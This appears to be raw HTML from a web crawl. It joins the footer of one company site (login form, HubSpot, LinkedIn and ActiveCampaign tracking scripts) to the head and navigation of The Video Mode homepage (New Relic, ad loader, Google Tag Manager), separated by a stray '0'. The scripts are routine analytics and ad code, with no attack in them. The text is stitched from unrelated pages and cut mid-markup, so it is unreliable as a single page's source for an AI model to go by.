onclick="cwLogin()" class="yellowbutton btn btn-primary btn-small" value="Login" name="Submit2"></td> <td><span class="width:130px;"><a href="javascript:emailPassword();">Forgot Password?</a></span> <img height="0" width="5" src="images/spacer.gif"></td></tr><tr><td> </td><td></td></tr> </tbody></table></form></td></tr></tbody></table></div></div> <div class="modal-footer"></div> </div></div></div></div></div></footer> </div> </div> <script> ( function ( body ) { 'use strict'; body.className = body.className.replace( /\btribe-no-js\b/, 'tribe-js' ); } )( document.body ); </script> <script> /* <![CDATA[ */var tribe_l10n_datatables = {"aria":{"sort_ascending":": activate to sort column ascending","sort_descending":": activate to sort column descending"},"length_menu":"Show _MENU_ entries","empty_table":"No data available in table","info":"Showing _START_ to _END_ of _TOTAL_ entries","info_empty":"Showing 0 to 0 of 0 entries","info_filtered":"(filtered from _MAX_ total entries)","zero_records":"No matching records found","search":"Search:","all_selected_text":"All items on this page were selected. ","select_all_link":"Select all pages","clear_selection":"Clear Selection.","pagination":{"all":"All","next":"Next","previous":"Previous"},"select":{"rows":{"0":"","_":": Selected %d rows","1":": Selected 1 row"}},"datepicker":{"dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["January","February","March","April","May","June","July","August","September","October","November","December"],"nextText":"Next","prevText":"Prev","currentText":"Today","closeText":"Done"}};var tribe_system_info = {"sysinfo_optin_nonce":"0c043dd464","clipboard_btn_text":"Copy to clipboard","clipboard_copied_text":"System info copied","clipboard_fail_text":"Press \"Cmd + C\" to copy"};/* ]]> */ </script><script type="text/javascript"> jQuery(window).load(function() { jQuery( '#banner' ).fitVids(); jQuery( '#banner' ).flexslider2({namespace: "wooslider-" , animation: "fade", useCSS: true, slideshowSpeed: 10000, animationSpeed: 1000, slideshow: true, video: true, directionNav: false, keyboard: false, mousewheel: false, pausePlay: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: true, touch: true, controlNav: true, start: function(slider){var wooslider_holder = jQuery(slider).find("li.slide"); if(0 !== wooslider_holder.length){ var wooslides = ([]).concat(wooslider_holder.splice(0,2), wooslider_holder.splice(-2,2), jQuery.makeArray(wooslider_holder)); jQuery.each(wooslides, function(i,el){ var content = jQuery(this).attr("data-wooslidercontent"); if(typeof content == "undefined" || false == content) return; jQuery(this).append(content).removeAttr("data-wooslidercontent"); }); } jQuery(slider).fitVids(); var maxHeight = 0; jQuery(slider).find(".wooslider-control-nav li").each(function(i,el) { maxHeight = maxHeight > jQuery(this).height() ? maxHeight : jQuery(this).height(); }); jQuery(slider).css("margin-bottom", maxHeight + 20 + "px");var wooslider_holder = jQuery(slider).find("li.slide"); if(0 !== wooslider_holder.length){ var wooslides = ([]).concat(wooslider_holder.splice(0,2), wooslider_holder.splice(-2,2), jQuery.makeArray(wooslider_holder)); jQuery.each(wooslides, function(i,el){ var content = jQuery(this).attr("data-wooslidercontent"); if(typeof content == "undefined" || false == content) return; jQuery(this).append(content).removeAttr("data-wooslidercontent"); }); } jQuery(slider).fitVids(); var maxHeight = 0; jQuery(slider).find(".wooslider-control-nav li").each(function(i,el) { maxHeight = maxHeight > jQuery(this).height() ? maxHeight : jQuery(this).height(); }); jQuery(slider).css("margin-bottom", "0" + "px");}, before: function(slider){}, after: function(slider){}, end: function(slider){}, added: function(slider){}, removed: function(slider){}}); }); </script> <script type='text/javascript' src='https://pronto-core-cdn.prontomarketing.com/2/wp-content/plugins/jetpack/modules/sharedaddy/sharing.js?ver=4'></script> <script type='text/javascript' src='https://pronto-core-cdn.prontomarketing.com/2/wp-content/plugins/pronto-magnific-popup/pronto_jquery_magnific_popup.js?ver=5.1.1'></script> <script type='text/javascript' src='https://pronto-core-cdn.prontomarketing.com/2/wp-content/plugins/pronto-magnific-popup/pronto_jquery_initialize.js?ver=5.1.1'></script> <script type='text/javascript' src='https://pronto-core-cdn.prontomarketing.com/2/wp-content/plugins/pronto-sidebar-navigation/js/jquery.flexnav.js?ver=4.0'></script> <script type='text/javascript' src='https://pronto-core-cdn.prontomarketing.com/2/wp-content/themes/phoenix/js/skip-link-focus-fix.js?ver=20130115'></script> <script type='text/javascript' src='https://pronto-core-cdn.prontomarketing.com/2/wp-content/plugins/pronto-lead-insights/js/lip.js?ver=20150324'></script> <script type='text/javascript' src='https://pronto-core-cdn.prontomarketing.com/2/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://pronto-core-cdn.prontomarketing.com/2/wp-content/plugins/wooslider/assets/js/jquery.mousewheel.min.js?ver=2.1.0-20121206'></script> <script type='text/javascript' src='https://pronto-core-cdn.prontomarketing.com/2/wp-content/plugins/wooslider/assets/js/jquery.flexslider.min.js?ver=2.4.1-20170608'></script> <script type='text/javascript' src='https://pronto-core-cdn.prontomarketing.com/2/wp-content/plugins/wooslider/assets/js/jquery.fitvids.js?ver=2.1.0-20121206'></script> <!-- hook code snippet footer --> <script type="text/javascript"> _linkedin_data_partner_id = "40919"; </script><script type="text/javascript"> (function(){var s = document.getElementsByTagName("script")[0]; var b = document.createElement("script"); b.type = "text/javascript";b.async = true; b.src = "https://snap.licdn.com/li.lms-analytics/insight.min.js"; s.parentNode.insertBefore(b, s);})(); </script><script type="text/javascript"> var trackcmp_email = ''; var trackcmp = document.createElement("script"); trackcmp.async = true; trackcmp.type = 'text/javascript'; trackcmp.src = '//trackcmp.net/visit?actid=1000045788&e='+encodeURIComponent(trackcmp_email)+'&r='+encodeURIComponent(document.referrer)+'&u='+encodeURIComponent(window.location.href); var trackcmp_s = document.getElementsByTagName("script"); if (trackcmp_s.length) { trackcmp_s[0].parentNode.appendChild(trackcmp); } else { var trackcmp_h = document.getElementsByTagName("head"); trackcmp_h.length && trackcmp_h[0].appendChild(trackcmp); } </script><script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.3/jquery.easing.min.js"></script> <script> var $ = jQuery.noConflict(); $(document).ready(function(){ $('body').append('<div id="topcontrol" style="position: fixed; bottom: 0px; right: 0px; opacity: 1; cursor: pointer; opacity: 0;"><div id="scrolltotop"></div></div>'); var _duration= 800; var _ease= 0; $("[rel=jumpdown]").click(function(e){ e.preventDefault(); $("body, html").animate({ scrollTop: $( $(this).attr('href') ).offset().top }, 800); }); // When the user scrolls down 20px from the top of the document, show the button window.onscroll = function() { scrollFunction() }; function scrollFunction() { if (document.body.scrollTop > 20 || document.documentElement.scrollTop > 20) { $('#topcontrol').css('opacity','1'); } else { $('#topcontrol').css('opacity','0'); } } // When the user clicks on the button, scroll to the top of the document $('#topcontrol').on('click',function(){ $("html, body").animate({ scrollTop: 0 }, 800); }); }); </script><!-- Start of HubSpot Embed Code --> <script type="text/javascript" src="//js.hs-scripts.com/5530881.js"></script> <!-- End of HubSpot Embed Code --> <!-- end hook code snippet footer --> <!--Javascript--> <script src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/themes/phoenix/bootstrap/js/bootstrap.min.js"></script> <script src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/themes/phoenix/js/main.js?1543907317"></script> </body> </html>
0
<!doctype html> <!--[if lt IE 7 ]> <html lang="en-US" prefix="og: http://ogp.me/ns#" class="no-js ie6 lt-ie9 lt-ie8 lt-ie7"> <![endif]--> <!--[if IE 7 ]> <html lang="en-US" prefix="og: http://ogp.me/ns#" class="no-js ie7 lt-ie9 lt-ie8"> <![endif]--> <!--[if IE 8 ]> <html lang="en-US" prefix="og: http://ogp.me/ns#" class="no-js ie8 lt-ie9"> <![endif]--> <!--[if gt IE 8]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#" class="no-js"> <!--<![endif]--> <head> <!-- utf-8 --> <meta charset="UTF-8" /><script type="text/javascript">window.NREUM||(NREUM={}),__nr_require=function(e,n,t){function r(t){if(!n[t]){var o=n[t]={exports:{}};e[t][0].call(o.exports,function(n){var o=e[t][1][n];return r(o||n)},o,o.exports)}return n[t].exports}if("function"==typeof __nr_require)return __nr_require;for(var o=0;o<t.length;o++)r(t[o]);return r}({1:[function(e,n,t){function r(){}function o(e,n,t){return function(){return i(e,[c.now()].concat(u(arguments)),n?null:this,t),n?void 0:this}}var i=e("handle"),a=e(3),u=e(4),f=e("ee").get("tracer"),c=e("loader"),s=NREUM;"undefined"==typeof window.newrelic&&(newrelic=s);var p=["setPageViewName","setCustomAttribute","setErrorHandler","finished","addToTrace","inlineHit","addRelease"],d="api-",l=d+"ixn-";a(p,function(e,n){s[n]=o(d+n,!0,"api")}),s.addPageAction=o(d+"addPageAction",!0),s.setCurrentRouteName=o(d+"routeName",!0),n.exports=newrelic,s.interaction=function(){return(new r).get()};var m=r.prototype={createTracer:function(e,n){var t={},r=this,o="function"==typeof n;return i(l+"tracer",[c.now(),e,t],r),function(){if(f.emit((o?"":"no-")+"fn-start",[c.now(),r,o],t),o)try{return n.apply(this,arguments)}catch(e){throw f.emit("fn-err",[arguments,this,e],t),e}finally{f.emit("fn-end",[c.now()],t)}}}};a("actionText,setName,setAttribute,save,ignore,onEnd,getContext,end,get".split(","),function(e,n){m[n]=o(l+n)}),newrelic.noticeError=function(e,n){"string"==typeof e&&(e=new Error(e)),i("err",[e,c.now(),!1,n])}},{}],2:[function(e,n,t){function r(e,n){if(!o)return!1;if(e!==o)return!1;if(!n)return!0;if(!i)return!1;for(var t=i.split("."),r=n.split("."),a=0;a<r.length;a++)if(r[a]!==t[a])return!1;return!0}var o=null,i=null,a=/Version\/(\S+)\s+Safari/;if(navigator.userAgent){var u=navigator.userAgent,f=u.match(a);f&&u.indexOf("Chrome")===-1&&u.indexOf("Chromium")===-1&&(o="Safari",i=f[1])}n.exports={agent:o,version:i,match:r}},{}],3:[function(e,n,t){function r(e,n){var t=[],r="",i=0;for(r in e)o.call(e,r)&&(t[i]=n(r,e[r]),i+=1);return t}var o=Object.prototype.hasOwnProperty;n.exports=r},{}],4:[function(e,n,t){function r(e,n,t){n||(n=0),"undefined"==typeof t&&(t=e?e.length:0);for(var r=-1,o=t-n||0,i=Array(o<0?0:o);++r<o;)i[r]=e[n+r];return i}n.exports=r},{}],5:[function(e,n,t){n.exports={exists:"undefined"!=typeof window.performance&&window.performance.timing&&"undefined"!=typeof window.performance.timing.navigationStart}},{}],ee:[function(e,n,t){function r(){}function o(e){function n(e){return e&&e instanceof r?e:e?f(e,u,i):i()}function t(t,r,o,i){if(!d.aborted||i){e&&e(t,r,o);for(var a=n(o),u=v(t),f=u.length,c=0;c<f;c++)u[c].apply(a,r);var p=s[y[t]];return p&&p.push([b,t,r,a]),a}}function l(e,n){h[e]=v(e).concat(n)}function m(e,n){var t=h[e];if(t)for(var r=0;r<t.length;r++)t[r]===n&&t.splice(r,1)}function v(e){return h[e]||[]}function g(e){return p[e]=p[e]||o(t)}function w(e,n){c(e,function(e,t){n=n||"feature",y[t]=n,n in s||(s[n]=[])})}var h={},y={},b={on:l,addEventListener:l,removeEventListener:m,emit:t,get:g,listeners:v,context:n,buffer:w,abort:a,aborted:!1};return b}function i(){return new r}function a(){(s.api||s.feature)&&(d.aborted=!0,s=d.backlog={})}var u="nr@context",f=e("gos"),c=e(3),s={},p={},d=n.exports=o();d.backlog=s},{}],gos:[function(e,n,t){function r(e,n,t){if(o.call(e,n))return e[n];var r=t();if(Object.defineProperty&&Object.keys)try{return Object.defineProperty(e,n,{value:r,writable:!0,enumerable:!1}),r}catch(i){}return e[n]=r,r}var o=Object.prototype.hasOwnProperty;n.exports=r},{}],handle:[function(e,n,t){function r(e,n,t,r){o.buffer([e],r),o.emit(e,n,t)}var o=e("ee").get("handle");n.exports=r,r.ee=o},{}],id:[function(e,n,t){function r(e){var n=typeof e;return!e||"object"!==n&&"function"!==n?-1:e===window?0:a(e,i,function(){return o++})}var o=1,i="nr@id",a=e("gos");n.exports=r},{}],loader:[function(e,n,t){function r(){if(!E++){var e=x.info=NREUM.info,n=l.getElementsByTagName("script")[0];if(setTimeout(s.abort,3e4),!(e&&e.licenseKey&&e.applicationID&&n))return s.abort();c(y,function(n,t){e[n]||(e[n]=t)}),f("mark",["onload",a()+x.offset],null,"api");var t=l.createElement("script");t.src="https://"+e.agent,n.parentNode.insertBefore(t,n)}}function o(){"complete"===l.readyState&&i()}function i(){f("mark",["domContent",a()+x.offset],null,"api")}function a(){return O.exists&&performance.now?Math.round(performance.now()):(u=Math.max((new Date).getTime(),u))-x.offset}var u=(new Date).getTime(),f=e("handle"),c=e(3),s=e("ee"),p=e(2),d=window,l=d.document,m="addEventListener",v="attachEvent",g=d.XMLHttpRequest,w=g&&g.prototype;NREUM.o={ST:setTimeout,SI:d.setImmediate,CT:clearTimeout,XHR:g,REQ:d.Request,EV:d.Event,PR:d.Promise,MO:d.MutationObserver};var h=""+location,y={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",agent:"js-agent.newrelic.com/nr-1123.min.js"},b=g&&w&&w[m]&&!/CriOS/.test(navigator.userAgent),x=n.exports={offset:u,now:a,origin:h,features:{},xhrWrappable:b,userAgent:p};e(1),l[m]?(l[m]("DOMContentLoaded",i,!1),d[m]("load",r,!1)):(l[v]("onreadystatechange",o),d[v]("onload",r)),f("mark",["firstbyte",u],null,"api");var E=0,O=e(5)},{}]},{},["loader"]);</script> <!-- set mobile viewport --> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <!-- wp_head --> <title>The Video Mode - Film making and video editing advice</title> <style type="text/css"> @font-face { font-family: "keystone"; font-weight: normal; font-style: normal; src: url("//www.thevideomode.com/wp-content/themes/keystone-theme/assets/fonts/pythagoras.woff2?v=1557930479") format("woff2"), url("//www.thevideomode.com/wp-content/themes/keystone-theme/assets/fonts/pythagoras.woff?v=1557930479") format("woff"); } .icon-spinner { background-image: url("//www.thevideomode.com/wp-content/themes/keystone-theme/assets/images/spinner.gif"); } .ie7 input { behavior:url("//www.thevideomode.com/wp-content/themes/keystone-theme/assets/js/ext/boxsizing.htc"); } </style> <script type="text/javascript"> window.ipcTags = {"site":"videomode","section":"home","type":"homepage","cplatform":"keystone","dfp_config":{"required_tags":["type","section","site","pub","amp","single"],"available_criteria":{"mobile":{"criteria":{"window_greater_than":{"width_minimum":0},"window_less_than_equal_to":{"width_maximum":689}},"display_mode":"mobile"},"tablet":{"criteria":{"window_greater_than":{"width_minimum":690},"window_less_than_equal_to":{"width_maximum":1019}},"display_mode":"mobile"},"desktop":{"criteria":{"window_greater_than":{"width_minimum":1020}},"display_mode":"desktop"}},"slots":{"col-3-plus":{"name":"billboard01","criteria":["desktop"],"sizes":[[970,250],[970,90],[728,90]]},"col-2":{"name":"leaderboard01","criteria":["tablet"],"sizes":[320,50]},"col-1":{"criteria":["mobile"],"name":"mobilebanner01","sizes":[320,50]},"dfpad-mpu-1":{"name":"mpu01","criteria":["desktop","tablet"],"sizes":[[300,250],[300,600],[300,1050]]},"dfpad-mpu-2":{"name":"mpu02","criteria":["desktop","tablet"],"sizes":[[300,250],[300,600],[300,1050]]},"instream-1":{"name":"instream01","criteria":["mobile"],"sizes":[300,250]},"dfpad-overlay":{"name":"overlay","sizes":[1,1]},"dfpad-mpu-1-mobile":{"name":"mpu01","inview":true,"criteria":["mobile","tablet"],"sizes":[[300,250],[300,1]]},"dfpad-mpu-2-mobile":{"name":"mpu02","inview":true,"criteria":["mobile","tablet"],"sizes":[[300,250],[300,1]]},"dfpad-mpu-3-mobile":{"name":"mpu03","inview":true,"criteria":["mobile","tablet"],"sizes":[[300,250],[300,1]]},"dfpad-mpu-4-mobile":{"name":"mpu04","inview":true,"criteria":["mobile","tablet"],"sizes":[[300,250],[300,1]]},"dfpad-mpu-5-mobile":{"name":"mpu05","inview":true,"criteria":["mobile","tablet"],"sizes":[[300,250],[300,1]]},"instream":{"name":"instream","inview":false,"criteria":["mobile"],"sizes":[11,2]},"sovrn":{"name":"sovrn","inview":false,"criteria":["desktop","tablet","mobile"],"sizes":[12,2]}}},"env":"prod","geo":"","skimlinks_enabled":true,"pxslot_base":"homepage","amp":false,"single":false,"pub":"video_photographer","template":"page-home"}; </script> <meta name="description" content="The Video Mode features a range of video tips and tutorials to help you learn film making techniques. Including shooting, video editing, and inspiration."/> <meta name="robots" content="noodp"/> <link rel="canonical" href="http://www.thevideomode.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="The Video Mode - Film making and video editing advice" /> <meta property="og:description" content="The Video Mode features a range of video tips and tutorials to help you learn film making techniques. Including shooting, video editing, and inspiration." /> <meta property="og:url" content="http://www.thevideomode.com/" /> <meta property="og:site_name" content="The Video Mode" /> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"http:\/\/www.thevideomode.com\/","name":"The Video Mode","potentialAction":{"@type":"SearchAction","target":"http:\/\/www.thevideomode.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <meta name="google-site-verification" content="n2BSWf_cywxhFPj-lEum81nTKnnfsJXnwztxXA9NiFw" /> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//keyassets.timeincuk.net' /> <link rel='dns-prefetch' href='//assets.ipcdigital.co.uk' /> <link href='https://securepubads.g.doubleclick.net' crossorigin rel='preconnect' /> <link rel="alternate" type="application/rss+xml" title="The Video Mode &raquo; Feed" href="http://www.thevideomode.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="The Video Mode &raquo; Home Comments Feed" href="http://www.thevideomode.com/home/feed/" /> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='http://www.thevideomode.com/wp-includes/css/dist/block-library/style.min.css?ver=NS4x' type='text/css' media='all' /> <link rel='stylesheet' id='ks-jwplayer-css-css' href='http://www.thevideomode.com/wp-content/plugins/keystone-jwplayer/assets/css/main.css?ver=1.0.1' type='text/css' media='all' /> <link rel='stylesheet' id='google-fonts-css' href='//fonts.googleapis.com/css?family=Roboto%3A700%7CTitillium+Web%3A600%7CTitillium+Web%3Anormal%7CRoboto%3Anormal&#038;ver=2087582778220014563' type='text/css' media='all' /> <link rel='stylesheet' id='keystone-css' href='https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/148309221a5e4263dd8ce58cf325f118/keystone.css' type='text/css' media='all' /> <!-- IE icons --> <!--[if lt IE 8]> <link rel='stylesheet' id='keystone-ie-icons-css' href='http://www.thevideomode.com/wp-content/themes/keystone-theme/assets/less/keystone-ie-icons.css?ver=2087582778220014563' type='text/css' media='screen' /> <![endif]--> <script type='text/javascript' src='http://www.thevideomode.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <link rel='https://api.w.org/' href='http://www.thevideomode.com/wp-json/' /> <link rel='shortlink' href='http://www.thevideomode.com/' /> <link rel="alternate" type="application/json+oembed" href="http://www.thevideomode.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.thevideomode.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://www.thevideomode.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.thevideomode.com%2F&#038;format=xml" /> <script type="text/javascript" charset="utf-8"> (function(a,b,c,d){ var protocol = "https://"; a="assets.ti-media.net/js/e1512726446_2a23693/min/gtm/utils-min.js"; b=document;c='script';d=b.createElement(c);d.src=protocol+a;d.async=true;d.type='text/java'+c; a=b.getElementsByTagName(c)[0];a.parentNode.insertBefore(d,a); })(); </script> <!-- Google Tag Manager --> <script>(function ( w, d, s, l, i ) { w[ l ] = w[ l ] || []; w[ l ].push({ 'gtm.start' : new Date().getTime(), event : 'gtm.js' }); var f = d.getElementsByTagName(s)[ 0 ], j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : ''; j.async = true; j.src = 'https://www.googletagmanager.com/gtm.js?id=' + i + dl; f.parentNode.insertBefore(j, f); })(window, document, 'script', 'dataLayer','GTM-N7W4V32');</script> <!-- End Google Tag Manager --> <style type="text/css"> body.custom-background { -webkit-background-size: auto; -moz-background-size: auto; background-size: auto; } </style> <!-- allow pinned app in ie9+ / windows 8 --> <meta name="application-name" content="The Video Mode" /> <meta name="msapplication-tooltip" content=""/> <meta name="msapplication-starturl" content="http://www.thevideomode.com"/> <!-- icons --> <link rel="shortcut icon" type="image/x-icon" href="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/06/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/06/Icon.jpg" /> <meta name="msapplication-TileImage" content="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/06/Icon.jpg"> <style type="text/css" id="custom-background-css"> body.custom-background { background-color: #070606; } </style> <!--[if lt IE 9]> <script type='text/javascript' src='http://www.thevideomode.com/wp-content/themes/keystone-theme/assets/js/ext/respond.js'></script> <![endif]--> <script>(function(H){H.className=H.className.replace(/\bno-js\b/,'js')})(document.documentElement)</script> </head> <body class="home page-template page-template-pages page-template-home page-template-pageshome-php page page-id-3 custom-background has-adverts site-33 child-site y2019 m05 d16 h16 section-home pythagoras"> <!-- Start keystone_after_body --> <script type="text/javascript" charset="utf-8"> /** * Initiate the adloader */ ipc.adloader.setProvider('dfp'); var googletag = googletag || {}; googletag.cmd = googletag.cmd || []; var adloaderConfig = {}; (function () { if (ipc.adloader.getProvider() === "dfp") { ipc.adloader.setDisplayMode('responsive'); adloaderConfig = { 'accountId': '18711560', 'environment': 'live', 'googleTag': googletag }; var gads = document.createElement('script'); gads.async = true; gads.type = 'text/javascript'; var useSSL = 'https:' == document.location.protocol; gads.src = (useSSL ? 'https:' : 'http:') + '//www.googletagservices.com/tag/js/gpt.js'; var node = document.getElementsByTagName('script')[0]; node.parentNode.insertBefore(gads, node); ipc.adloader.init(adloaderConfig); window.ipcTags = window.ipcTags || {}; if (typeof window.ipcTags.platform === "undefined") { window.ipcTags.platform = ipc.adloader.getDisplayMode(); } } })(); </script> <!-- Google Tag Manager (noscript) --> <noscript> <iframe src="https://www.googletagmanager.com/ns.html?id=GTM-N7W4V32" height="0" width="0" style="display:none;visibility:hidden"></iframe> </noscript> <!-- End Google Tag Manager (noscript) --> <!-- end keystone after body --> <div id="accessibility" class="sr-only"> <a href="#content" class="skip-link">Skip to content &raquo;</a> </div><!-- #accessibility --> <div id="wrapper" class="hfeed container palette-a"> <header id="header" role="banner" class="style-underline"> <div class="row extended-header palette-a" id="extended-header-split"> <div class="col-lg-3 col-md-3 hidden-sm hidden-xs" id="extended-header-left"> <section id="keystone_logo_widget-3" class="widget widget-area-1-col keystone_logo_widget-class"><h1 itemtype="http://schema.org/Organization" class="vcard site-title-new desktop-template text-left"> <a itemprop="url" href="http://www.thevideomode.com" title="The Video Mode" class="url"> <span class="sr-only fn org nickname" itemprop="name">The Video Mode</span> <img itemprop="logo" class="logo photo non-retina" src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-1-e1505298668988.jpg?v=2087582778220014563" alt="The Video Mode" /> <img src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-e1505298734564.jpg?v=2087582778220014563" alt="The Video Mode" class="retina"/> </a> </h1></section><!-- .widget --> </div> <div class="col-lg-6 col-md-6 col-sm-12 hidden-xs" id="extended-header-middle"> </div> <div class="col-lg-3 col-md-3 hidden-sm hidden-xs" id="extended-header-right"> </div> </div> <div class="row branding palette-a"> <div class="col-xs-12 hidden-sm hidden-md hidden-lg"> <h1 itemtype="http://schema.org/Organization" class="vcard site-title-new mobile-template "> <a itemprop="url" href="http://www.thevideomode.com" title="The Video Mode" class="url"> <span class="sr-only fn org nickname" itemprop="name">The Video Mode</span> <img itemprop="logo" class="logo photo non-retina" src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/08/Webp.net-resizeimage-4.png?v=2087582778220014563" alt="The Video Mode" /> <img src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg?v=2087582778220014563" alt="The Video Mode" class="retina"/> </a> </h1> </div> </div> <nav id="navigation" role="navigation" class="row"> <div class="menu-tools menu-item-has-children"> <a href="#" class="menu-toggle menu-icon-link"> <span class="icon-menu"></span> </a> <ul class="menu-stash hidden-xs main-menu sub-menu"></ul> </div> <div class="menu-search menu-item-has-children"> <a href="#" class="menu-toggle-search menu-icon-link"> <span class="icon-search"></span> </a> <div class="sub-menu"> <form role="search" method="get" class="search-form form-inline" action="http://www.thevideomode.com/"> <div class="input-group"> <input type="search" value="" name="s" class="input-sm search-field form-control" placeholder="Search The Video Mode"> <label class="sr-only">Search for:</label> <span class="input-group-btn"> <button type="submit" class="search-submit btn btn-primary btn-sm">Search</button> </span> </div> </form> </div> </div> <div class="menu-navigation"><ul id="menu-navigation" class="main-menu"><li id="menu-item-14" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-3 current_page_item menu-icon-home first-menu-item menu-item-14"><a href="http://www.thevideomode.com/" aria-current="page"><span class="menu-icon-item icon-home"></span></a></li> <li id="menu-item-32" class="menu-item menu-item-type-taxonomy menu-item-object-category no-icon menu-item-32"><a href="http://www.thevideomode.com/news/"><span>Video News</span><span class="mobile-drop-down icon-down"></span></a></li> <li id="menu-item-30" class="menu-item menu-item-type-taxonomy menu-item-object-category no-icon menu-item-30"><a href="http://www.thevideomode.com/showcase/"><span>Showcase</span><span class="mobile-drop-down icon-down"></span></a></li> <li id="menu-item-1394" class="menu-item menu-item-type-taxonomy menu-item-object-category no-icon menu-item-1394"><a href="http://www.thevideomode.com/interviews/"><span>Interviews</span><span class="mobile-drop-down icon-down"></span></a></li> <li id="menu-item-33" class="menu-item menu-item-type-taxonomy menu-item-object-category no-icon menu-item-33"><a href="http://www.thevideomode.com/tuition/"><span>Film Tuition</span><span class="mobile-drop-down icon-down"></span></a></li> <li id="menu-item-1114" class="menu-item menu-item-type-custom menu-item-object-custom no-icon menu-item-1114"><a href="http://www.thevideomode.com/reviews/"><span>Reviews</span><span class="mobile-drop-down icon-down"></span></a></li> <li id="menu-item-31" class="menu-item menu-item-type-taxonomy menu-item-object-category no-icon menu-item-31"><a href="http://www.thevideomode.com/equipment/"><span>Equipment</span><span class="mobile-drop-down icon-down"></span></a></li> <li id="menu-item-1573" class="menu-item menu-item-type-custom menu-item-object-custom no-icon menu-item-1573"><a href="http://www.thevideomode.com/tag/drones/"><span>Drones</span><span class="mobile-drop-down icon-down"></span></a></li> <li id="menu-item-1589" class="menu-item menu-item-type-custom menu-item-object-custom no-icon last-menu-item menu-item-1589"><a href="https://comps.amateurphotographer.co.uk/"><span>Win</span><span class="mobile-drop-down icon-down"></span></a></li> </ul></div> </nav><!-- #navigation --> </header><!-- #header --> <aside class="row advert header-advert"> <div class="section-content"> <div class="hidden-xs hidden-sm"> <div id="col-3-plus" class="ipc-advert"><script type="text/javascript">if(typeof ipc.adloader !== "undefined"){ ipc.adloader.registerSlot('col-3-plus'); }</script></div> </div> <div class="hidden-xs hidden-md hidden-lg"> <div id="col-2" class="ipc-advert"><script type="text/javascript">if(typeof ipc.adloader !== "undefined"){ ipc.adloader.registerSlot('col-2'); }</script></div> </div> <div class="hidden-md hidden-lg"> <div id="col-1" class="ipc-advert"><script type="text/javascript">if(typeof ipc.adloader !== "undefined"){ ipc.adloader.registerSlot('col-1'); }</script></div> </div> </div> </aside> <aside class="row"> <div class="col-xs-12 sidebar sidebar-top"> <section id="keystone-query-widget-id-16" class="palette-a listing--single s-container visible-sm hidden-xs widget widget-area-4-col keystone-query-widget"><div class="section section-style-hero"> <article class="post-3471 post type-post status-publish format-video has-post-thumbnail hentry category-equipment category-interviews category-tuition tag-film-making-basics tag-how-to tag-interview tag-tips tag-top-story post_format-post-format-video publication_name-video-photographer loop loop-even loop-0 featured-image featured-video" role="article"> <div class="entry-media"> <a href="http://www.thevideomode.com/tuition/top-tips-shooting-better-video-3471/" rel="bookmark"><img width="1300" height="600" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/10/videographer.png" class="lazyload blur-up attachment-full size-full" alt="" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/10/videographer.png 1300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/10/videographer-135x62.png 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/10/videographer-300x138.png 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/10/videographer-630x291.png 630w" data-image-id="5778" /></a> </div> <header class="entry-header alignbottom aligncentre full-width"> <h2 class="entry-title sub-heading media-heading"><a href="http://www.thevideomode.com/tuition/top-tips-shooting-better-video-3471/" rel="bookmark"><span><span>Five</span> <span>tips</span> <span>for</span> <span>shooting</span> <span>better</span> <span>video</span> </span></a></h2> </header> </article> </div></section><!-- .widget --> </div> </aside> <div id="content" role="main"> <div class="row"> <div class="primary col-xs-12 col-md-8 col-lg-6"> <div class="row"> <section class="col-xs-12 sidebar sidebar-double"> <section id="keystone-query-widget-id-17" class="palette-a listing--single s-container visible-xs widget widget-area-2-col keystone-query-widget"><div class="section section-style-list-large 